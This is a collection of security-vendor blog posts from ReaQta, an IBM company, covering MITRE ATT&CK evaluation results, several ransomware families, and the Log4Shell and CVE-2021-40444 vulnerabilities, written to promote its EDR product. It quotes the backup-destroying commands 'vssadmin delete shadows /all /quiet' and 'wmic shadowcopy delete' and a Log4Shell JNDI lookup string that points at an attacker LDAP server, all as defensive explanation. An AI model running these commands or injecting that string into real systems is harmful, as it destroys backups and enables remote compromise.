MITRE ATT&CK Wizard Spider and Sandworm Evaluation: ReaQta, an IBM company demonstrates Best-in-Class capabilities for Three Years in a row.

MITRE Engenuity has just released the results of the latest round of ATT&CK Evaluations which this year focused on two well-known threat actors: Wizard Spider and Sandworm.

This marks the third time that ReaQta, an IBM Company, has successfully completed the ATT&CK Evaluations with top-quality alerts, showing ReaQta’s capabilities in delivering world-class protection against even the most complex attacks in real-time, without human intervention.

ReaQta’s achievements in this year’s evaluation included the following:

  • 100% Detection coverage across the cyber kill chain.
  • No configuration changes during the evaluation.
  • 100% of detections done in real-time and without delays.

Before diving into the result details, we would like to give a short overview of the MITRE ATT&CK evaluations and the two threat groups Wizard Spider and Sandworm that form the subject of this year’s evaluation as well as the testing environment.

About the Evaluations

MITRE introduced the ATT&CK framework in 2015 as a knowledge base of adversary tactics and  techniques and it has since then become the de facto standard framework for cyber security professionals looking to make their organizations more cyber resilient. In 2019 MITRE started with the ATT&CK Evaluations to help vendors assess their capabilities against adversary behaviors. Besides the Triton Evaluation in 2021 focussed on ICS vendors, this is the third Evaluation for IT: APT29 (2019), Carbanak + FIn7 (2020), Wizard Spider & Sandworm (2021) and also the third time ReaQta has successfully participated.

This year’s MITRE Evaluation covered two infamous threat groups that have wreaked havoc for many organizations worldwide.

The first threat group in the evaluation, Wizard Spider, is a financially motivated Russian speaking criminal group and focuses primarily on extortion through Ransomware attacks.

This group has operated the Trickbot botnet (banking Trojan) since 2016 infecting over 1 million computing devices. They are also the group behind the Conti (ransomware) and started ransomware campaigns in 2018 targeting larger organizations like hospitals and big corporations. According to the FBI, Wizard Spider extorted USD$61 Million for ransomware attacks within just 1 a year.

Sandworm is the second threat group in this year’s evaluation. Sandworm Team is state-sponsored and focuses on destruction of data and system interoperability.

The Russian hacking group has been active since 2009 and operated the NotPetya malware in 2017 in a worldwide attack with the purpose of destroying data. This attack caused many casualties such as Maersk shipping, TNT Express and Merck pharmaceutical. The latter claimed USD$1.3 billion in losses due to interrupted operations. Other infamous attacks attributed to Sandworm include the attacks against Ukrainian electrical companies (2016) and the French presidential campaign (2017). In 2018, the Sandworm Team attacked the Winter Olympic Games in South Korea.

About the Testing Environment

Similar to previous years, the NanoOS™, our live hypervisor used to detect high-level malicious behavior could not be used due to restrictions in the testing environment, and this resulted in several missed detections. Even without this core component, ReaQta was able to achieve 100% detection coverage across the cyber kill chain.

In previous editions, we participated with a Linux agent for detections, but this year we opted out for Linux evaluation as results would not represent our upcoming Next Gen Linux agent.

100% detection coverage across the cyber kill chain

In both Wizard Spider & Sandworm scenarios, ReaQta autonomously reconstructed the attack activity across the cyber kill chain into a few condensed high-fidelity alerts with meaningful and actionable steps to the analyst. ReaQta detected the most critical events needed for investigation and analysis as well as the key MITRE ATT&CK evaluation objective, Encryption for Data Impact, keeping customers secure.

Why is this Important?

Customers prefer less alerts that are highly consolidated as compared to multiple and less informative ones. Our approach reduces manual workload and provides a clear picture of unfolding events, with no need to chase attackers over thousands of different security events.

When malicious or suspicious activity is detected, ReaQta switches from smart-logging into deep monitoring mode, capturing all events pertaining to the incident presenting the information in a single consolidated alert. This provides a clear picture of unfolding events, with no need to piece together multiple triggers across thousands of different security events, saving the analyst precious time in triaging and incident response. 

Experienced analysts understand that not all MITRE ATT&CK techniques have the same importance and we believe those detections missed (e.g. system discovery) to be less relevant, even if they are part of the framework describing an attacker step. Every attack leverages on a series of techniques and some techniques have sub-techniques, but not every technique/sub-technique has the same operational importance from the analyst perspective. Some of them have significant importance for investigation while others can be deduced logically.

By-design, ReaQta does not observe techniques/sub-techniques of lesser importance, which are evaluated as misses. To increase the visibility of techniques/sub-techniques, most EDR solutions rely on API hooking but this approach is easy to circumvent by attackers and require frequent updates to maintain operational stability. ReaQta chooses  to rely on other data sources at different OS layers for our detections. ReaQta only collects useful information that is essential for the analyst to make a difference in investigation and response outcomes.  

Even with the NanoOS™ disabled, ReaQta still provides visibility into every stage of the attack life cycle, across the cyber kill chain.

No Configuration changes during the entire evaluation

The MITRE results evaluate the number of configuration changes. Configuration changes are essentially modifications to the product after the first evaluation. This means that the product was tweaked in order to improve the detection results. This year, configuration changes were placed in 4 main categories, Detection Logic, Data Source, UX and Miscellaneous. 

Throughout the evaluation, ReaQta did all the detections without any configuration changes. Configuration changes help vendors adjust their detections as the attack progresses. Most vendors had to tweak their product ‘antennas’ multiple times before being able to detect meaningful techniques. 

Why is this Important?

In real-life scenarios, configuration changes are usually unrealistic and implies high operational overheads which was not taken into consideration as part of the evaluation, but has a significant impact to organizations using the solution. The more configurations a solution requires, the more an organization has to invest in its operation and maintenance. Attackers do not give defenders a second chance to tweak their detections before moving to the next step. 

100% of detections done in real-time without delays    

The MITRE results also evaluate the number of delayed detections (shown in red, see chart: Configuration Changes + Delayed Detections). Delayed detections are detections generated with delay and that are not available to the analyst (e.g., require sandbox evaluation). This may be critical (or not) depending on the threat being detected with delay.

Using ReaQta’s behavioral analysis engines, all detections were entirely in real-time. Each technique of the attack was tracked as-it-happened, minimizing the risk of losing important events instead of waiting for external components to run their analyses.

Why is this Important?

As attackers innovate, automation allows attackers to move extremely quickly within networks. Operations that used to take minutes or hours now take seconds. The ability to have immediate identification & automated response could result in the difference between a threat stopped at its tracks or an organization compromised and having to perform cleanup and recovery operations.

Closing Remarks

With the completion of MITRE ATT&CK round 4, we are ever more sure of our mission and philosophy to only capture and present necessary information needed by the analyst to help them do their work in the most efficient way possible. This in turn translates to the reduction in operational costs, and lowering the overall Mean Time to Respond (MTTR), hence mitigating the actual cyber risks for organizations. 

Acing the MITRE test (i.e., achieving the maximum score), requires monitoring a lot of events, which may often be unnecessary and result in more false positives, causing analysts to become prone to alert fatigue and miss out on the meaningful information in a timely fashion. This increased data collection also leads to increased storage costs and affects threat response efficiencies.

ReaQta is committed to the MITRE Engenuity ATT&CK Evaluations that helps governments and organizations to combat cyber attacks through proven defense practices. We look forward to participating in the next round.

Delivering Security without complexity

ReaQta’s autonomous endpoint detection and response (EDR) platform aims to solve for the increasing number of businesses falling victim to malicious activities from cyber criminals and nation state actors. While traditional protection methods fight known threats but stand vulnerable to sophisticated attack techniques, ReaQta’s revolutionary platform stops both known and unknown threats in real-time. Through the use of machine learning, the platform constantly improves on defining normal behavior tailored to each business per endpoint, allowing it to detect and block any abnormal malicious behavior. ReaQta was recently named a 2020 Cool Vendor by Gartner in Network and Endpoint Security for this unique approach in tackling cyber threats of all forms.

To learn more about what makes ReaQta unique, please visit Why ReaQta and apply for a demonstration.

Register for our 2022 IBM Security ReaQta MITRE Engenuity ATT&CK Evaluation Results Webinar here.


The arrival of Windows 11, seamlessly supported by ReaQta

Microsoft has made Windows 11 operating system available for new machines since October 5, 2021 and having the Windows 11 ISO download go-live at the same time. This means that anyone can update their existing machine without waiting for a prompt or choose to do a complete fresh install by themselves. According to a note in the Microsoft Document, Microsoft has also accelerated the offering of Windows 11 to eligible devices.

Through Microsoft’s own machine learning processes, it will automatically determine if a system can handle a Windows 11 upgrade The minimum system requirements can be found here.  

Windows 11 system requirements

Should the specifications not be met, the Operating System parts for upgrade will not arrive, as determined by Microsoft’s machine learning processes. Machines that do not meet the requirements for upgrade will continue to function with Windows 10, with the support lifecyle ending on October 14th, 2025. This will be the 10 years mark since the operating system was first introduced. 

New call-to-action

For those who are unsure if your PC can run Windows 11, please download the PC Health Check app to find out.

Does ReaQta Support Windows 11?

At ReaQta, we have made certain that our customers will be supported on Windows 11 from day one, out of the box, extending ReaQta’s extensive security suite to our customers.

ReaQta agent running on Windows 11 Operating System

ReaQta Windows agent, version 3.6.1 and above, fully supports Windows 11, providing the same security and performance coverage on Windows 11 as on Windows 10. For devices with an older version of ReaQta agent, please upgrade the agent prior to Windows 11 upgrade to be supported. 

New call-to-action

Rook Ransomware (RaaS): The latest kid on the block with an attitude.

Rook, the latest kid on the block for ransomware operations, first appeared on VirusTotal on 26 November 2021. Since its discovery, Rook has claimed its victims across verticals like Banking, Finance, Technology and Aerospace and they have been announced on their TOR site. Like most ransomware operations, Rook utilizes a ‘double extortion’ approach to force its victims into payment. The stolen data is then displayed as proof of compromise, with accompanying information on the total amount of data stolen.

(Rook Tor Site)

(Victim’s compromised data is displayed on the TOR site)
Analyzing Rook

When executed, Rook encrypts all files, deletes backups via vssadmin.exe and removes itself from the compromised machine. It then leaves a ransom note.

(Rook ransom note)

Rook’s ransom notes state that compromised victims should contact the group within 3 days for the ransom amount to be subject to a “50% discount”. However, if this condition is not met, the company’s files will be leaked onto their onion network. Contact to the Rook team can be established via e-mail (rook@onionmail.org; securityRook@onionmail.org) or via the TOR browser link. The group also warns that should external help via software or third party assistance be used for decryption and restoration, the private key may be damaged, which would consequently lead to a total loss of data. 

New call-to-action

Running the attack

Upon the execution of the Rook ransomware, ReaQta-Hive autonomously reconstructed the breach, providing complete visibility across attacker tactics and techniques.

(ReaQta-Hive’s Behavioural Tree showing the Rook ransomware)

The behavioral tree maps all processes and behaviors involved in the infection to Mitre’s Attack Tactics and Techniques. Rook ransomware also uses the vssadmin.exe delete shadows/all/quiet command to delete shadow backup volume, much like what we have seen from Babuk and Avaddon. While some threat actors do focus restoration prevention, ReaQta provides additional layered defense via Destra on the detections on the misuse of wmic.exe and vssadmin.exe.

(Rook is automatically stopped by ReaQta-Hive within seconds)

Within seconds of the infection, ReaQta was effectively able to prevent costly and tiresome business interruptions. Aside from just stopping the threat, ReaQta’s AI algorithms automatically terminated all malicious processes involved in the incident. The vassadmin.exe process is also automatically terminated once the threat has been neutralized. Thereafter, ReaQta-Hive closed off the alert, reducing extra actions needed to be taken by the security team.

New call-to-action

Cyber threats will only continue to rise globally, given that the returns on investment of such ransomware attacks has unfortunately been proven. The aftermath of such infections remain alarming as an organizations ‘crown jewels’ are seized, and sensitive data is encrypted. 

By default, all applications and platforms should be built with security in mind. This includes having security design in the organization’s processes in order to protect both the company and consumers’ data. Organizations should also conduct checks: Are the security solutions that they are utilizing able to keep up with the pace of threats today? Are employees in the know about potential threats that they encounter?

ReaQta-Hive’s customers stay protected from threats like Rook.

To learn more about what makes ReaQta unique, please visit Why ReaQta and apply for a demonstration.

Babuk Ransomware (RaaS): Back-up Deletion and how to stop it

Babuk ransomware was discovered in January 2021 and operated a ransomware-as-a-service (RaaS) model before shutting down its operations in April. The group’s modus operandi is much like other RaaS operations, compromising organizations via phishing attempts or vulnerability exploits such as those used by HAFNIUM to gain initial access. This is followed by exfiltration of sensitive data and encryption of key assets. A key focus for the group is to prevent any possibility of data recovery via the termination of ongoing applications and back-ups during exfiltration, which includes the deletion of Windows shadow copies and recycle bin.

Through its operations, the group has explicitly stated that they would not target hospitals, non-profit charities and schools, or any organizations with revenues less than USD4 million annually. Babuk has since shut down their operations, and have released full source codes of their ransomware builder and decryptor on a hacking forum.

New call-to-action

Analyzing Babuk

Upon execution, Babuk encrypts all files on the victim’s machine while deleting away backups, preventing file recovery and system restore. This is then followed by a ransom note with a link to the Babuk Tor site.

Babuk ransom note

Running the attack

ReaQta-Hive reconstructs the breach, providing complete details of attacker tactics.

ReaQta-Hive’s Behavioural Tree showing the Babuk ransomware

ReaQta-Hive is equipped with ransomware protection capabilities to prevent any potential data encryption on endpoints. Any ransomware behavior is automatically blocked upon detection to ensure that sensitive data is protected. 

vssadmin.exe delete shadows/all/quiet command is captured on the behavioral tree

There are several ways that ransomware malware developers can use as part of their backup prevention operation. The most common approach would be to delete Shadow Volume Copies, via vssadmin.exe Delete Shadows /All /Quiet command as captured on the behavioral tree. This command executes vssadmin.exe utility to quietly delete allShadow Volume Copies on the machine. Shadow Volume Copies, which are usually done daily, provides the ability for manual or automatic backups, or snapshots even when files are in use. This allows organizations to roll back Windows to a previous configuration should the need arise. Ransomware Groups such as Babuk design the ransomware with the ability to delete Shadow Volume copies upon an infection, preventing its usage to recover encrypted files.

“vssadmin.exe” delete shadows/all/quiet command via Command Prompt

Cyber criminals also use wmic.exe shadowcopy delete to delete away Shadow Copies. While taking into account the varied mechanisms for backup deletion, ReaQta uses DeStra to monitor for vssadmin.exe and wmic.exe activities. DeStra, also known as Detection Strategy, is a real-time scripting engine that allows security operators to write custom detection and response rules, tailored to the needs and requirements of businesses. Should such techniques be employed, DeStra provides real-time alerts to the IT security teams and prevents the deletion of the backups via the termination of the vssadmin and wmic commands. 

DeStra detection for process “vssadmin.exe” and “wmic.exe”

ReaQta-Hive autonomously stops Babuk in very early attack stages, effectively mitigating business interruptions. ReaQta’s AI automatically terminated all malicious processes and prevented the threat within seconds before closing the alert to reduce any additional actions required of security teams.

Babuk is automatically stopped by ReaQta-Hive within seconds

As ransomware attacks become more prevalent in today’s threat landscape, organizations should adopt adequate and necessary security measures to future-proof their businesses. 

New call-to-action

To learn more about what makes ReaQta unique, please visit Why ReaQta and apply for a demonstration.

Defend against Log4Shell exploits (CVE-2021-44228) with ReaQta-Hive

A previously unknown vulnerability, CVE-2021-44228 also dubbed Log4Shell, in Apache’s popular logging library, Log4j, was discovered to have been exploited in the wild for several days prior to the vulnerability being publicly disclosed on 9 December. Affected versions of Log4j include 2.0-beta9 to 2.15.0. The vulnerability, through a simple exploitation, provides an attacker with the ability to leverage the Java Naming and Directory Interface (JNDI) from wherever Log4j is used to initiate a request to a malicious server that they control. The simplicity of the exploit, and ubiquity of Log4j’s use in applications, allows for widespread attacks across the Internet. While the exploit is exceedingly simple to execute, additional post-exploitation activity is required for an attacker to establish a foothold on targeted networks. ReaQta Hive will provide visibility into unexpected behavior of any application leveraging Log4j, and will detect the malicious techniques necessary for post-exploitation behavior.

New call-to-action

CVE-2021-44228 exists within Log4j’s feature enabling the use of JNDI. JNDI allows a java application to look up resources with names. In particular, it allows the use of a service provider interface that can then allow the use of a directory service such as LDAP. As affected versions of Log4j will evaluate a value expression in Java that is sent as logged data, such as ${object.property}, an attacker can include a JNDI lookup that includes a request to a directory or naming service within a value expression. For example, modifying their user agent string (commonly logged by web services) to a value expression, an attacker can trigger Log4j to initiate a request to a server controlled by the attacker. 

An often used example in public discussions of CVE-2021-44228 include triggering a connection to an attacker controlled LDAP server. For this, all that is needed is to include LDAP request in a string representing a value expression such as ${jdni:ldap://<host>:1389/malicious}. This string then needs to be processed along with any text that is handled by Log4j. Once Log4j handles the data, the value expression will be evaluated with eventually the LDAP request initiated. 

New call-to-action

The popularity of Log4j with services ranging from web or desktop applications to database or indexing services, provides an enormous attack surface on the Internet for attackers to target. The simplicity of exploitation, for example simply initiating HTTP requests with modified user agent strings to any web service, allows attackers to easily scale out attacks across the Internet. 

Still, however, an attacker is not finished with establishing a foothold upon successful exploitation. For this the affected server leveraging Log4j must be able to initiate an outbound request to the attacker-controlled server thereby delivering payloads for additional stages of the attack-chain. The exploit can also be used for other arbitrary remote command execution, but other vectors after exploitation would require more knowledge of the targeted environment.The additional requirements force an attacker to conduct activity that would be visible to any effective EDR solution.

Identify attacks with ReaQta-Hive

With ReaQta Hive, the use of the exploit to push any connection attempt to a malicious server would show unexpected network activity from the vulnerable application using affected versions of Log4j.

For example, exploiting a desktop application to contact a malicious LDAP server will show the application establishing a LDAP connection in ReaQta Hive’s telemetry. But follow-on activity required by the attacker does not change, and execution of malicious payloads on targeted servers or leveraging techniques and procedures for post-exploitation means the detection and remediation capabilities are not evaded.

CVE-2021-44228 will certainly remain a widespread problem for the foreseeable future. The number of applications which leverage Log4j is enormous, and additional vulnerable applications will likely continue to be publicly disclosed. However, there are a number of significant mitigations aside from developers upgrading to a fixed version of Log4j, currently version 2.17.0. Restricting unnecessary outbound ports at the firewall level can prevent initiation of malicious requests to external LDAP servers.

Monitoring endpoints and servers with an effective EDR platform which can both identify suspicious activity but also remediate upon detection will also prevent follow-on activity by attackers that attempt to exploit CVE-2021-44228.

IBM to Acquire ReaQta

An event of this magnitude requires more than my usual few lines on LinkedIn: we have entered into an agreement to be acquired by IBM.

For the past 7 years, we’ve worked hard to create an environment that fosters innovation and promotes new ideas, we’ve challenged the “usual way of doing things” and arrived at new concepts, ideas, workflows and technologies. Most of what we ended up creating emerged from our own constraints and desire to build a process that was efficient and more machine-driven, we never liked the idea of solving problems by hiding them behind the now proverbial RFoP (Room Full of People), we felt like it was cheating and wanted to make sure that all the tedious or time-sensitive tasks were taken over – to the maximum extent possible – by algorithms. For us, A.I. and Machine Learning were never buzzwords but a means to an end.

The result was a solution, ReaQta-Hive, that I personally loved from day one, as it embodied our core values: simplicity and automation. Building an “easy-to-use” business solution is definitely a difficult task. Finding the balance between how much data to show and how much you choose not to, in order to avoid information overload, is incredibly difficult. How do you select what’s important? How do you decide what isn’t? We’re dealing with sophisticated threats, where nothing is certain and everything is new, so drawing the line is often difficult. Our secret weapon has always been a team of incredibly gifted talent that we have carefully selected – and many times they have chosen us! – over the years. We’ve always made sure to keep the conversation going between all departments, and these exchanges have worked very well to plant the seeds for brilliant new ideas.

All those efforts eventually paid off, Gartner named us Cool Vendors in October 2020, we successfully managed several MITRE rounds, and our customer base continued to grow at a steady pace. Shortly thereafter, when the conversation with IBM began, the security team shared their ideas and strategy with us and everything aligned perfectly. Discussion after discussion it became clear that the direction we had taken, and the direction IBM had chosen, were really the same (net of a difference in scale factor, of course ;). And here we are today.

I’m excited about what’s coming next and also incredibly proud. The idea of participating in the creation of QRadar XDR, on such a large scale, is incredibly rewarding and is also a strong validation of the technology we have developed. I’m proud, because this is the result of a fantastic team that managed to remain cohesive, reliable, inventive and vibrant, even as the world was changing and we moved from bustling offices to the tranquility of our living rooms.

In IBM we will join forces with top talent from around the world, a unique opportunity for our team to be exposed to the best and most creative minds and continue to innovate faster than we ever thought possible. This is the beginning of an exciting new journey to change the way we think about cybersecurity, and I’m excited about what lies ahead!

Cover image shamelessly stolen from Christopher Meenan’s LinkedIn post.

Alberto Pelliccione

AvosLocker Ransomware (RaaS): A New Ransomware Group Emerges

AvosLocker recently made headlines as a new ransomware-as-a-service (RaaS) that commenced operations in June, represented by a purple bug brand logo. Operating based on a similar modus operandi to most RaaS, AvosLocker has started promoting its RaaS program via various forums on the dark web in its search for affiliates. AvosLocker’s primary mode of malware delivery is through spam email campaigns and online advertisements. After a successful compromise, AvosLocker then offers technical assistance to victims, providing support to recover the compromised systems. As seen on their Tor Network Site, AvosLocker uses 256-bit custom AES encryption and appends encrypted files with the extension .avos. Victims are then led to a landing page to begin the negotiations with the AvosLocker team.

AvosLocker Tor Site
Analyzing AvosLocker
AvosLocker ransom note

Upon execution, AvosLocker encrypts files on the victim’s machine and disables file recovery and system restore. A ransom note is left on the victim’s machine, which includes a link and a corresponding ID for access to the AvosLocker Tor site.

AvosLocker payment page

Once access is granted, AvosLocker provides a clean user interface that displays four main components: 

  1. Countdown Timer –  Displays time left before the ransom is doubled.
  2. Test Decryption –  A feature that allows victims to upload an encrypted sample file to check whether it can be successfully decrypted.
  3. Support Bot – A chat feature that gives victims the ability to interact with the AvosLocker group and is used for negotiations and payment support-related matters.
  4. Payment Information – A QR code is provided for payment address with the ransom currency denoted in cryptocurrency XMR (MONERO).
AvosLocker is paid via MONERO cryptocurrency

Subsequently, should the owner of the data choose to not pay the ransom, the AvosLocker group then puts the victim’s data up for sale via a press release.

AvosLocker Press Release Onion Service on the Tor network (captured October 20, 2021)

Within seconds of an infection, ReaQta-Hive is able to effectively reconstruct the complete breach, by providing complete details of attacker tactics.

New call-to-action

Running the attack

ReaQta-Hive’s Behavioural Tree showing the AvosLocker ransomware

ReaQta-Hive is equipped with ransomware protection capabilities to prevent any potential data encryption on endpoints. Any ransomware behaviour is automatically blocked upon detection to ensure that sensitive data is protected.

AvosLocker is automatically stopped by ReaQta-Hive within seconds

ReaQta-Hive was able to autonomously stop AvosLocker in very early attack stages, effectively mitigating any business interruptions. ReaQta’s AI automations terminated all malicious processes and stopped the threat within seconds, then closed off the alert to reduce any additional actions required of security teams.

New call-to-action

Ransomware attacks will only continue to surge globally. Organizations and its security leaders should already have security and mitigation plans in place to ensure that their sensitive data stays safe against any destructive malware.

To learn more about what makes ReaQta unique, please visit Why ReaQta and apply for a demonstration.

Conti Ransomware (RaaS): A New Wage-Paying Affiliate Model

The Cybersecurity and Infrastructure Security Agency (CISA) issued an advisory on Sep 22 around the CONTI Ransomware Group, providing detailed information regarding its exploits and affiliates. Together with the Federal Bureau of Investigation (FBI), they have seen Conti ransomware in over 400 attacks targeted on international enterprises. A PDF version of the advisory which contains a technical breakdown on the ransomware group and the mitigation steps is available here.

While operating as a ransomware-as-a-service model, Conti provides a different compensation structure as compared to typical affiliate models. According to CISA, Conti has devised a new wage-paying scheme for deployers of the ransomware, instead of only receiving a fractional return of proceeds from a successful compromise. While other RaaS models like LockBit2.0, BlackMatter and RansomEXX pay affiliates only when a breach is successful, Conti lowers the barriers for malicious insiders or disgruntled employees to launch ransomware. This greatly incentivises deviant behavior as potential insiders get paid at the onset, even if the attack is unsuccessful.

New call-to-action

Analyzing Conti
Conti Recovery Service Tor Site

Conti actors use a wide range of tools and methods to gain initial access into organizations, including the use of targeted spear phishing campaigns via custom crafted emails that contain malicious attachments or links, that often contain embedded scripts that are used to download or drop other malware. 

Other common methods of entry include stolen or weak Remote Desktop Protocol (RDP) credentials, phone calls, illegitimate software, other malware distribution networks and common vulnerabilities in external assets.

New call-to-action

According to a leaked Conti ransomware playbook, Conti actors exploit vulnerabilities such as “PrintNightmare” in unpatched assets to escalate privileges and move laterally across a victim’s network. Once the victim’s data has been stolen and encrypted, a double extortion technique is employed, demanding a ransom in exchange for the encrypted information. The victim is then threatened with the public release of the data should ransom be left unpaid.

Conti ransom note

Running the attack

ReaQta-Hive reconstructs an entire breach within seconds of an infection, by providing the full details of attack behaviours and techniques used.

ReaQta-Hive’s Behavioural Tree showing the Conti ransomware

Built with ransomware protection capabilities, ReaQta-Hive autonomously blocks ransomware once any ransomware behavior is exhibited to prevent any potential data encryption on the endpoint.

Conti is automatically stopped by ReaQta-Hive within seconds

ReaQta automatically stopped Conti within seconds, effectively mitigating the risks of any business interruptions and downtime. In addition to stopping the threat, ReaQta’s AI automations autonomously terminated all malicious processes and closed off the alert, reducing any extra actions required of the security team.

As ransomware attacks continue to grow to become one of the greatest security challenges for organizations globally, it is imperative that security leaders prioritize having mitigation plans ready so that swift action can be taken.

New call-to-action


CISA recommends the following actions to reduce the risk of compromise by a Conti ransomware attack: 

  1. Ensure multi-factor authentication (MFA) is enabled across the organization.
  2. Ensure network segmentation via the usage of demilitarized zones (DMZs) and network traffic management controls are in place to prevent ingress and egress communications with known malicious IP addresses. Implement strong spam filters and conduct regular user training programs to enforce proper cyber hygiene.
  3. Ensure assets and software are routinely patched and updated.
  4. Use application allowlisting, preventing employees from installing illegitimate applications or unauthorized software which contravenes organization’s security policy. Implement execution prevention by disabling macro scripts from Microsoft Office files transmitted via email.
  5. Implement endpoint and detection response tools. Endpoint and detection response tools like ReaQta-Hive provide unparalleled visibility into the security status of endpoints and proactively secure organisations against malicious cyber actors.
  6. Control access to resources over the network, i.e restricting RDP.
  7. Ensure user accounts are properly configured for the right access controls and privilege rights and check logs to ensure account holders are legitimate users.

To learn more about what makes ReaQta unique, please visit Why ReaQta and apply for a demonstration.

Remote code execution vulnerability CVE-2021-40444 could become the next prolific cyber crime tool. Here’s how to stay ahead of such exploits.

A recently discovered exploit targeting a vulnerability in Microsoft’s internal browser engine, MSHTML, could become a prolific tool by cyber criminals in both targeted and wide-spread campaigns. CVE-2021-40444, a remote code execution vulnerability within Microsoft’s MSHTML browser engine was disclosed by Microsoft in a 07 September 2021 advisory1 but a malicious document involved in the exploit chain was discovered separately by security researchers a week prior. Public analysis of the document has led to the creation of multiple proof of concepts of the exploit now widely available. Despite the availability and ease of use of the exploit, any attack chain involving the exploit will generate noticeably anomalous behavior on the target machines.

According to Microsoft in a 15 September analysis of the exploit chain2, attacks involving the exploit were first observed in August 2021 in which emails posing as legal agreements led the victim to the malicious document on a file sharing site. Once the document was opened, a malicious JavaScript contained in another remotely hosted file was loaded via an external OLEObject relationship. The use of the exploit allowed the attack to circumvent Protected Mode in Microsoft Office, thus not requiring any additional interaction by the victim. From there, a remotely hosted CAB file containing a DLL posing as a INF file was downloaded, decompressed, then loaded, which in turn fetched a custom Cobalt Strike beacon loader. 

New call-to-action

The exploit itself is not technically challenging to deploy, and since the exploit was first made known to the broader public, several proof of concepts have been publicly released to include examples which makes customization relatively easy. As MSHTML is exposed in all Microsoft Windows environments, the exploit will remain effective on any unpatched system. Thus the availability and far reach of the exploit will likely make it a common tool among attackers conducting wide-spread malicious email campaigns. 

Analyzing the exploits

ReaQta analyzed the use of both the exploits found in the wild and proof of concepts available to the public, and found glaring red flags instantly among the telemetry. To include techniques known on the MITRE ATT&CK Framework such as T1129, Shared Modules.

ReaQta mapped the use of exploits to the MITRE ATT&CK Framework

In loading the module, the attack leverages Microsoft’s URL protocol handler but for control panel files, “.cpl://”, followed by a relative path traversal. Aside from the loading of the module, the use of .cpl:// in the URL is conspicuous and in particular its use in loading an INF file.

Of course, besides the very unusual activity around loading the malicious module, overall behaviour of Microsoft Office triggers numerous actions resembling known techniques mapped to the MITRE ATT&CK framework as well as spawning child processes.

The attack chain generates numerous events mapped to known techniques.

Even without a patch covering CVE-2021-40444, similar exploits — even against zero day vulnerabilities — cannot be executed without generating activity on target machines that is not highly anomalous thus detectable by an effective EDR protection. While attackers must first work to evade standard security features in the OS, such as additional warnings and restrictions for users like with Protected Mode, living off the land attacks require atypical use of legitimate tools and protocols available on the target machine. Additionally, the attack cycle does not end with successful exploitation of CVE-2021-40444. The attackers must still conduct follow-on activity to gain wider access to the target’s network.

New call-to-action

In-depth monitoring and threat detailing with ReaQta-Hive

ReaQta-Hive is designed to detect such activity immediately, but agents can more specifically detail the threat through the use of ReaQta’s DeStra engine. The DeStra engine allows for an additional layer of monitoring capabilities, allowing blue teams to craft simple yet sophisticated correlations based on the insights of the HIVE agents. While exploits against CVE-2021-40444 already trigger alerts in HIVE, a DeStra rule can mark the specific attacks in an alert. In this case matching the observed user agent in the HTTP request for the second stage payload (“Microsoft Office Discovery Protocol”) or matching the use of .cpl:// with a relative path traversal in the command line of an event.


[1] ​​Microsoft. 2021. “Microsoft MSHTML Remote Code Execution Vulnerability.” Microsoft Security Response Center.

[2]Microsoft. 2021. “Analyzing attacks that exploit the CVE-2021-40444 MSHTML vulnerability.” Microsoft Threat Intelligence Center.

To learn more about what makes ReaQta unique, please visit Why ReaQta and apply for a demonstration.

BlackMatter Ransomware: A New Ransomware-as-a-Service (RaaS)

Following the recent trend in ransomware affiliates, BlackMatter has emerged as the latest ransomware-as-service (RaaS). According to Threat Intelligence company Recorded Future, BlackMatter has announced that they have “incorporated in itself the best features of DarkSide, REvil, and LockBit” as mentioned in an interview. Black Matter cited the following inspirations from each of their partner programs: 

  • From REvil: The implementation of SafeMode was thought of as weak and not well thought through. BlackMatter then built upon this idea before thoroughly implementing it. They also implemented the PowerShell version of the ransomware variant.
  • From LockBit: BlackMatter drew on LockBit’s approach for the implementation of a codebase as well as other minute details.
  • From DarkSide: The idea of impersonation (namely, the encryptor’s ability to use the domain administrator’s account to encrypt shared drives with maximum rights) and the structure of the admin panel were borrowed.

With reference to the hacker blog, BlackMatter targets organisations with a revenue of $100 million and more, and minimally 500-15,000 hosts in the network. The threat actor has also disclosed that they will not be targeting industries such as healthcare and state institutions. BlackMatter actively advertises the purchase of network access into organizations, offering a price range of $3,000-$100,000, including a percentage of the potential ransom amount. This modus operandi is gaining notoriety, aligned with other threat actor groups like Lockbit 2.0. 

New call-to-action

Analyzing BlackMatter

BlackMatter Blog

BlackMatter breaches organizations via purchased network access. Once initial access is secured, the threat actor moves laterally to key value targets and exfiltrates sensitive data, thereafter deploying ransomware in a centralised fashion, for instance, via the Domain Controller onto every single endpoint. Upon execution, BlackMatter encrypts files on the victim’s machine in a matter of seconds, disabling file recovery and system restore, and leaving a ransom note on the victim’s machine.

BlackMatter ransom note

Aside from just leaving a ransom note, BlackMatter alters the background image of the machine and directs the instruction to the README.txt file. 

BlackMatter background image change

Running the attack
Within seconds of an infection, ReaQta-Hive reconstructs the breach, providing pertinent information related to the behaviours and techniques exhibited. 

ReaQta-Hive’s Behavioural Tree showing the BlackMatter ransomware

Leveraging ReaQta’s ransomware protection capabilities, ransomware is autonomously stopped once ransomware behaviour is detected, preventing potential data encryption on the endpoint.

BlackMatter is automatically stopped by ReaQta-Hive within seconds

In the case of BlackMatter, ReaQta was effective within seconds, effectively mitigating potential business disruptions and downtime. In addition to stopping the threat, ReaQta’s AI automatically terminated all malicious processes involved in the incident, thereafter closing off the alert and reducing extra actions needed to be taken by the security team.

As ransomware attacks become increasingly rampant, organizations should not treat such attacks as an afterthought but instead have mitigation plans devised and ready.

New call-to-action

Ways to defend against a ransomware attack

According to Gartner Analyst, Paul Webber, “organizations need to focus on preparation and early mitigation if they want to cut losses to ransomware.” This mitigation strategy mentioned by Gartner covers the following six points:

  1. Perform initial ransomware assessments. Engage risk assessments and penetration tests to determine your organization’s attack surface and present state of security readiness in terms of tools, processes and skills to mitigate attacks.
  2. Ensure ransomware governance. Processes and execution contingency plans need to be in place to ensure swift response in the event of an actual crisis. It is also imperative for key stakeholders to be involved in this preparation.
  3. Having operational readiness at all times. Routinely stress test security systems that are put in place to ensure ransomware activities can be detected and prevented. Incorporate incident response scenarios into these ransomware response plans, so as to ensure that   the systems and processes put in place are not reliant on security systems that may be rendered unavailable in crisis time.
  4. Maintain backups for internal systems. Back up both data and all applications within the infrastructure. Ensure that backups are done frequently and cannot be compromised in a ransomware attack.
  5. Employ a Zero Trust security model. Restrict permissions and deny unauthorized access to devices. Remove local administrator rights from end users and block application installation for standard users. Instead, replace this with a centrally managed software distribution facility.
  6. Instill employee ransomware education. All employees should understand the ransomware threat and should be educated on the steps to take during a ransomware attack. 

